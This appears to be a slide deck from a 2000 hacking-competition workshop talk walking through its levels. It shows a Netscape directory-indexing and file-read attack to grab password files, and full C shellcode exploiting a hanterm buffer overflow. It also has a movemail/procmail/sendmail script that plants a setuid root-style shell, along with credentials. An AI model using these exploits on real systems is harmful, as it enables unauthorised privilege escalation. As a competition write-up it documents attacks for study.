1. 1 st OlymFair Workshop Hacking technique Taeho Oh ohhara@4dl.com ohhara@postech.edu http://postech.edu/~ohhara

2. Contents How to pass level 1 How to pass level 2 Why did many hackers consume much time in the level 2? About level 3 Conclusion

3. How to pass level 1 (1) What to do? –Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2

4. How to pass level 1 (2) Level 1 servers –203.227.243.161 –203.227.243.162 –203.227.243.163

5. How to pass level 1 (3) 203.227.243.161 –OS : Solaris 8 –Opened TCP port : 80, 8080

6. How to pass level 1 (4) 203.227.243.162 –OS : HPUX 11.0 –Opened TCP port : 22, 80, 8080

7. How to pass level 1 (5) 203.227.243.163 –OS : MS Windows 2000 –Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389

8. How to pass level 1 (6) Attack 203.227.243.161 –80 : Apache Web Server –8080 : Netscape Enterprise Server 80 and 8080 web server has same httpd home directory Netscape Enterprise Server has a security bug

9. How to pass level 1 (7) Netscape Enterprise Server security bug –I could see files in the specific directory like below http://203.227.243.161/?wp-cs-dump –You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr- prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp- stop-ver, and ?wp-uncheckout –I could browse the directories and check the file existence

10. How to pass level 1 (8) The file list / +-----cgi-bin/ |+-----data/ |+-----hackme/ |+-----a |+-----a.c |+-----show_file.html |+-----showfile.cgi +-----data/ +-----index.html Can’t access this directory

11. How to pass level 1 (9) Read.htaccess file with showfile.cgi –http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi- bin/data/.htaccess Read.htpasswd file from.htaccess with showfile.cgi –http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi- bin/data/.htpasswd

12. How to pass level 1 (10) I could crack the encrypted password from.htpasswd with Crack –id:password = admin:banana –I could access /cgi-bin/data directory with this id and password

13. How to pass level 1 (11) I could get the way to go to level 2 –http://203.227.243.161/data/idaccess.html This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi –My serial number KOR000321-961829513 –My password oD8YEuqYySWogKSQQsOY00zoAjUkxtv7

14. How to pass level 1 (12) Netscape Enterprise Server directory indexing vulnerability –See http://www.securityfocus.com/vdb/bottom.html ?vid=1063

15. How to pass level 1 (13) Netscape Enterprise Server directory indexing vulnerability patch information The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature. Also, manually editing the file obj.conf will do the same. Conduct a search for the following: Service method="(GET|HEAD)" type="magnus- internal/directory" fn="index-common" and replace fn="index-common" with fn="send-error".

16. How to pass level 2 (1) What to do? –Execute /home/forbidden/pass.cgi This executable file owner is root This executable file group is wizard The permission is 0510 Need wizard gid to execute /home/forbidden/pass.cgi

17. How to pass level 2 (2) Level 2 server –203.227.243.164 203.227.243.164 –OS : Linux –Opened TCP port : 23, 81

18. How to pass level 2 (3) Wizard setuid or setgid files -r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd -rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump -rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl -rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper -rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm -rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at -rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste -r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart -r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed -r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq -r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr -r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm

19. How to pass level 2 (4) Wizard setuid or setgid files ( Cont. ) -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl -rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503 -rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail -rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp -rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin -rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh -rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386- redhat-linux/movemail -rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail -rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute -rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper -rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport

20. How to pass level 2 (5) Attack process Get wizard euid Get wizard uid Create wizard uid, gid file Get wizard gid Execute pass.cgi Get level2 shell

21. How to pass level 2 (6) level2 shell  wizard euid –Exploit hanterm bug [I have no name!@level2... ]$ hanterm -hfn `perl -e "print 'A'x240"` can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAA AAAAAAAAAAAAAAAAAAAAAAAA [I have no name!@level2... ]$ hanterm -hfn `perl -e "print 'A'x250"` Segmentation fault [I have no name!@level2... ]$

22. How to pass level 2 (7) level2 shell  wizard euid (Cont.) –This is a classical buffer overflow bug –I could get wizard euid shell with 260 buffer size and -450 offset

23. How to pass level 2 (8) Exploit code #include #define OFFSET -450 #define RET_POSITION 260 #define RANGE 20 #define NOP 0x90 char shellcode[1024]= "\xeb\x1f“/* jmp 0x1f */ "\x5e“/* popl %esi */ "\x89\x76\x08“/* movl %esi,0x8(%esi) */

24. How to pass level 2 (9) Exploit code (Cont.) "\x31\xc0“/* xorl %eax,%eax */ "\x88\x46\x07“/* movb %eax,0x7(%esi) */ "\x89\x46\x0c“/* movl %eax,0xc(%esi) */ "\xb0\x0b“/* movb $0xb,%al */ "\x89\xf3“/* movl %esi,%ebx */ "\x8d\x4e\x08“/* leal 0x8(%esi),%ecx */ "\x8d\x56\x0c“/* leal 0xc(%esi),%edx */ "\xcd\x80“/* int $0x80 */ "\x31\xdb“/* xorl %ebx,%ebx */ "\x89\xd8“/* movl %ebx,%eax */

25. How to pass level 2 (10) Exploit code (Cont.) "\x40“/* inc %eax */ "\xcd\x80“/* int $0x80 */ "\xe8\xdc\xff\xff\xff“/* call -0x24 */ "/bin/sh";/*.string \"/bin/sh\" */ unsigned long get_sp(void) { __asm__("movl %esp,%eax"); } void main(int argc,char **argv) {

26. How to pass level 2 (11) Exploit code (Cont.) char buff[RET_POSITION+RANGE+1],*ptr; long *addr_ptr,addr; unsigned long sp; int offset=OFFSET,bsize=RET_POSITION+RANGE+1; int i; if(argc>1) offset=atoi(argv[1]); sp=get_sp(); addr=sp-offset; ptr=buff;

27. How to pass level 2 (12) Exploit code (Cont.) addr_ptr=(long*)ptr; for(i=0;i<bsize;i+=4) *(addr_ptr++)=addr; for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++) buff[i]=NOP; ptr=buff+bsize-RANGE*2-strlen(shellcode)-1; for(i=0;i<strlen(shellcode);i++) *(ptr++)=shellcode[i]; buff[bsize-1]='\0';

28. How to pass level 2 (13) Exploit code (Cont.) execl("/usr/X11R6/bin/hanterm","hanterm",“- hfn",buff,0); }

29. How to pass level 2 (14) wizard euid  wizard uid [I have no name!@level2... ]$ cat > a.c main(){ setreuid(501,501); execl("/bin/sh","sh",0); } [I have no name!@level2... ]$ gcc a.c ;./a.out [wizard@level2... ]$ whoami wizard [wizard@level2... ]$

30. How to pass level 2 (15) wizard uid  create wizard uid, gid file –movemail program is wizard setgid program movemail program output file is wizard gid [wizard@level2... ]$ echo haha > test1 [wizard@level2... ]$ movemail test1 test2 [wizard@level2... ]$ ls –l test1 test2 -rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1 -rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2 [wizard@level2... ]$ cat test2 haha

31. How to pass level 2 (16) wizard uid, gid file  wizard gid –procmail can execute a arbitrary shell command with wizard uid, gid when the user can create wizard uid, gid file

32. How to pass level 2 (17) Exploit code #!/bin/sh PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux export PATH cat > shh.c << EOF main(){ setreuid(501,501); setregid(501,501); execl("/bin/sh","sh",0); } EOF

33. How to pass level 2 (18) Exploit code (Cont.) gcc shh.c -o shh movemail shh shh2 cat > proc << EOF :0 * | /bin/chmod 6777 /tmp/shh2 EOF

34. How to pass level 2 (19) Exploit code (Cont.) movemail proc /home/wizard/.procmailrc echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard sleep 2 rm -f /home/wizard/.procmailrc rm -f./proc rm -f./exp rm -f./shh.c rm -f./shh echo "rm -f./shh2" |./shh2

35. How to pass level 2 (20) wizard gid  execute pass.cgi Congratulation!! You have passed Level 2. Your ID : KOR000321-961829513 Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9 IP for Level 3 is 203.227.243.173 It is protected by ip filtering. Please attack and acquire adminstrator's privilege.And then change the index.htm l under level3 server. Level 3 Login ID : level3 Level 4 Login Passwd : olymfair3

36. Why did many hackers consume much time in the level 2? (1) Almost all hackers tried to find a security bug –However, level2 can be cleared with not a bug but a feature. ( except for hanterm bug )

37. Why did many hackers consume much time in the level 2? (2) /sbin/dump program has a buffer overflow bug and exploit is not released –Many hackers try to exploit this program. However, the exploit is impossible because main function does not return but exit

38. Why did many hackers consume much time in the level 2? (3) /usr/bin/lprm exploit code generates segmentation fault message –The segmentation fault message is not generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bug.

39. About level 3 I consumed much time so I have no time to attack level 3 I tried to scan level 3 server –However, I can’t find opened TCP port –I didn’t try to attack level 3 from then on It seemed to take much time

40. Conclusion It was an interesting hacking competition